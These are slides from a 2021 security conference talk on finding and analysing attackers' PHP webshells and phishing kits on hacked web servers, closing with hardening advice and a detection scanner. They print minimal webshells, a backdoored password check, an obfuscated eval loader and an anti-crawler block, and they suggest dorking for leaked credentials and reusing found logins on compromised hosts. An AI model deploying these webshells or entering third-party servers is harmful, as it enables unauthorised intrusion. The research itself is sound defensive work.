Cannibal Hacking, from zero the hero to hammer smashed host
Hack In Paris 2021
19 November 2021
Synacktiv
0xMitsurugi
Table of contents
1 Introduction
2 Web (in)-security
3 Search all the things
4 Attacker arsenal
5 Real life example
6 Lessons learned
7 Conclusion
Presentation
Security researcher @Synacktiv
Vulnerability research & exploitation
Disclaimer: this research is done on personal time
0xMitsurugi
My company
https://www.synacktiv.com
Offensive security company, based in France
We're hiring!
reverse, pentest, DFIR, dev
interns!
just ask
3/71
Let's start!
IDA <3
About this talk
Warning
lack of asm, lack of 0-days
lack of legal basis ¯\(°_o)/¯
Webshells, attackers, scans
HTTP is everywhere
Seen weird logs? weird files? webshells? This is it!
Time flies…
It's been a long long time
COVID, delays, and so on: parts of this document are more than 2 years old…
Oldies but goodies
2 Web (in)-security
The bad guys
How not to get caught when delivering malware
Don't host it yourself
Use innocent victims
Hack them, and use those hosts!
Which malware?
phishing
mirai/gafgyt/bots/malware
data hosting
defacing (less and less)
any other purpose
The bad guys
(screenshots) Yummy! restaurant / Teach a man to phish…
The poor admins
Don't blame the admins
Usually, no time to patch
Not always tech people
Security is hard (sad but true)
Password 'password' is a good idea, no? … No?
And time flies
Company disappears but website still up
Website forgotten (last blog update 2014)
But pirates are admins too!
Guess what
They are no better
weak passwords
same techniques reused again and again
Lots of artefacts left
And bad infras
they hack poorly configured hosts?
they are poorly secured too!
directory listing enabled…
host multi-infected…
3 Search all the things
Search all the things
Goooooooooogle…
Dork like a boss
Just search…
Good google
Google is good? evil?
Google hides results
Be better than google
Dork like a boss
(screenshots) 853 only?? / Better
Dork like a boss
Words are blacklisted
Don't search for "password leaks" or "email hacked"
Better
gmail.com e10adc3949ba59abbe56e057f20f883e ext:txt
Why? That hash is the MD5 of 123456, a password present in nearly every leak:
$ echo -n 123456 | md5sum
e10adc3949ba59abbe56e057f20f883e
$
Dork like a boss
Webshells
search for names of webshells
(yes, it works…)
search for upload dirs
search for opendir
Use VirusTotal, urlscan and so on
Scrape google
use the archive
go back in time when the DNS record is gone:
curl --resolve infected.com:443:A.B.C.D https://infected.com
(the port in --resolve has to match the URL, 443 for https and 80 for http, otherwise curl ignores the entry and resolves normally)
Dork like a boss
think like a bad guy
how would you name a webshell or a command PHP file?
x.php? cmd.php? zz.php?
easy targets? upload dirs?
think like a phisher
do you remove your phish kit?
is the name paypal.zip? bank.zip? netflix.zip?
Dork like a boss
(screenshots of search results) Juicy search / Webshell / File Manager / perlbot, yikes! / Another webshell / And another webshell / And, yaaawn, another webshell / Wanna passwords?
Dork like a boss
Bad google
Google is clever and knows those tricks
Prepare to get captcha'd!
Bad searches
intitle:webshell
all of the so-called "best dorks of 2020" you found
And honeypots
You won't learn anything
Dork like a boss
(screenshots) Bim / Honeypot :(
Bounce like a boss
You get access!
Bad guys make mistakes, use them
Hosts are multi-infected!
Reuse creds
One more time for the merry-go-round
Another webshell named "haxor webshell"?
google intitle:haxor.webshell
Explore directories!
cheap hoster -> all hosts infected!
access.log -> find other webshells
Bounce like a boss
(screenshots) Starts with a phish / Then a host / Then a host / With free webshell!!
Bounce like a boss
user@debian$ du -hs infected/
1.5G infected/
user@debian$
4 Attacker arsenal
Analyze all the files
From old to new
oldest files are perl bots (yes… perl)
then C99
then webshells
file managers
minimalist webshells: uploader/unzipper
password protection…
PHP for the win
yes, PHP is over-represented
some ASP webshells, but they are negligible
Analyze all the files
Copy pasting
A lot of webshells
A gazillion copies of each
Same with phish kits
Same with file managers
Passwords are usually bad
If you have one shot, try 'cracking'
Making fun of mistakes
Yay! Mistakes!
(...)
$PASS='4d1f35512954cb227b25bbd92e15bc7b'; //$PASS=cracking
(...)
$PASS=md5('cracking')
<label for="Password">Password:</label><H1>cracking</H1>
<input class="password" type="password" id="Password" name="Password" />
Making fun of mistakes
Yay! Mistakes!
$PASS='4d1f35512954cb227b25bbd92e15bc7b';
$password = md5($_GET['pass']);
if (($password == $PASS) or (apache_request_headers()['L'] == 'L')) {
print("Access granted");
} else {
die();
}
(the second condition is a backdoor left by the webshell's author: the password is bypassed by one extra HTTP header)
Yes, some hackers are bad…
uploads x.php, x.php.txt, x.jpg, x.gif, x.php7, x.php.html …
Making fun of mistakes
(screenshot) Yeah, bro, put your mail here!
Backdooring the backdoor
Coding a webshell is hard, so…
Why not reuse this nice webshell found on a site with skulls and flames?
Pirates are not nice to each other
webshells are backdoored!
sometimes twice!
and sometimes the backdoor is itself backdoored (!?)
Backdooring the backdoor
<?php
(lot of php stuff)
eval(gzuncompress(base64_decode('a long string .... ')));
(again a lot of php stuff)
?>
Attacker defense
Bad guys are lame in security? Not at all…
.htaccess
antibots
passwords
fake 404
header checks
bouncers…
And annoying stuff
eval gzipped eval gzipped etc…
scrambling
php obfuscation
not efficient against motivated ones, but…
Attacker defense
/*------------------ Anti Crawler ------------*/
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
    {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/
Attacker defense
(screenshots) Some anti-something / Crude language / Much ASCII ART
Attacker defense
htaccess
sometimes small, sometimes big, sometimes fun
A.B.C.D // leecher!
E.F.G.H // NSA or google
I.J.K.L // fuck you!
Attacker defense
more and more passwords…
the old days
<?php
system($_GET['cmd']);
?>
and now…
<?php
if (isset($_GET['aef'])) { system($_POST['vji']); }
?>
(the odd GET parameter acts as the password: a crawler or scanner hitting the URL without it sees nothing)
But how did they get in? Can we know?
No DFIR today…
Sometimes easy to guess
unauthenticated upload dir
old vulnerable stuff
Sometimes impossible
SSH bruteforce?
other host?
other vector?
5 Real life example
Intermission 1
An innocent host with a view
Day 1: Windows malware
A new malware sample added each day for a week (low score on VT)
Day 10: phishing campaign (successful)
Day 11: phishing campaign (total failure)
Day 11 to 15: tons of new directories, half-installed phish kits
Day 15: everything wiped
Day 15: webserver deactivated
Curious cases of phishing failures
Teach a man to phish…
zip kits are forgotten on servers
… kits are poorly configured
… and sometimes multi-trojanized
… with results left on servers (???)
and sometimes with no results at all…
WHO earns money with that?
users of phishing kits?
sellers of phishing kits?
Curious cases of phishing failures
(screenshots) Bro, I have all your victims / Brand new 2021 they said…
Curious cases of phishing failures
Prepare to get bored
intitle:index.of intext:paypal.zip
download, grep for fopen
results in real time if you're quick enough
really disappointing
The boring case of Mirai/gafgyt and other bots
Mirai, gafgyt, and so on…
more boring than phish kits
always the same
follow the C&C for fun (?)
search for name, or client.c and server.c
Exceptionally
Once in a while
new malware variant
strong code
Example of unknown source (Troldesh maybe?)
Cheap technique
High impact
Still unclear
webshell well hidden
good passwords
Analyze all the files
Technique
A full WordPress theme uploaded
PHP code embedded in a WordPress variable (or in a base64 PNG)
Custom extraction routine
Password MD5 used as the seed to decrypt the PHP
Still working on it
Analyze all the files
(screenshots) First part is unsuspicious, but / something bad happens here
6 Lessons learned
From Zero to Hero
Does warning admins work?
Sometimes, I send mail
I can count the answers on one hand
But evil files tend to disappear :)
Who are those attackers?
cheap techniques
cheap attackers
as long as it works, they'll continue
Don't get your host smashed
Patch, update, maintain
Terminate old servers,
Patch the others,
Use strong passwords,
Audits,
yadda yadda…
$ grep -r 'exec(gzdecode' /var/www
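As an added example (not the speaker's tooling), a Python sweep of a webroot in the spirit of that grep, using indicators taken from the slides: packed eval, command execution fed from request parameters, the apache_request_headers backdoor and the anti-crawler fake 404. It also looks at the odd extensions the uploads arrive with (x.php.txt, x.php7, x.php.html). The sample files are constructed; INDICATORS, scan_tree and demo are names chosen for this example.

```python
import os
import re
import tempfile

# Indicators for the tricks shown on the slides (constructed here, not an exhaustive signature set)
INDICATORS = {
    "packed_eval": re.compile(r"\b(eval|assert)\s*\(\s*(gzuncompress|gzinflate|gzdecode|str_rot13|base64_decode)\s*\(", re.I),
    "exec_from_request": re.compile(r"\b(system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    "header_backdoor": re.compile(r"apache_request_headers\s*\(\s*\)\s*\[", re.I),
    # user-agent test + crawler names + fake 404, in any order (the anti-crawler block)
    "anti_crawler_404": re.compile(r"(?=[\s\S]*HTTP_USER_AGENT)(?=[\s\S]*(Google|Slurp|MSNBot|ia_archiver|Yandex))(?=[\s\S]*404 Not Found)", re.I),
}
# Uploads land as x.php.txt, x.php7, x.php.html ..., so decide by content, not only by .php
SUSPECT_EXT = (".php", ".php7", ".phtml", ".txt", ".html")

def scan_file(path):
    # names of the indicators that fire on one file
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def scan_tree(root):
    # relative path -> indicators, for every suspect file under root; clean files are omitted
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            found = scan_file(full) if fn.lower().endswith(SUSPECT_EXT) else []
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits

# Constructed samples mirroring the snippets on the slides
SAMPLES = {
    "index.php": "<?php echo 'hello'; ?>",
    "uploads/x.php7": "<?php if (isset($_GET['aef'])) { system($_POST['vji']); } ?>",
    "wp-content/themes/t/f.php": "<?php eval(gzuncompress(base64_decode('eJwDAAAAAAE='))); ?>",
    "admin/sh.php": ("<?php if(preg_match('/Google|Slurp/i', $_SERVER['HTTP_USER_AGENT'])) "
                     "{ header('HTTP/1.0 404 Not Found'); exit; }\n"
                     "if (apache_request_headers()['L'] == 'L') { print('Access granted'); } ?>"),
}

def demo():
    # write the samples into a scratch webroot, scan it, return the hits
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

demo() returns the flagged files with their indicators; point scan_tree() at a real webroot such as /var/www to sweep it.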
7 Conclusion
Is there a turning point?
Personal thought
Landscape is evolving
Less and less "personal" webservers
More and more Facebook pages, no more personal blogs
Or less and less PHP?
pirates are better at hiding?
or more and more exposure
trackers etc…
Final words?
bad guys are here
phishers, wannabe hackers, kiddies, bots…
lousy PHP scripts
they are not always lame, we just find the lamest
google is (bad|good)
Finding bad guys is harder
warning
I'm not a lawyer, but: don't do this at home, it may be highly illegal
use Tor (at the cost of high captcha rates)
use Kali in live mode in a VM on a burner laptop
DO YOU HAVE ANY QUESTIONS?
THANK YOU FOR YOUR ATTENTION